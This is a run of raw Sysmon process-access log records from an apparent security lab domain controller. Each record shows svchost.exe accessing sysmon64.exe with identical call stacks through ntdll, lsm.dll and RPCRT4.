13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 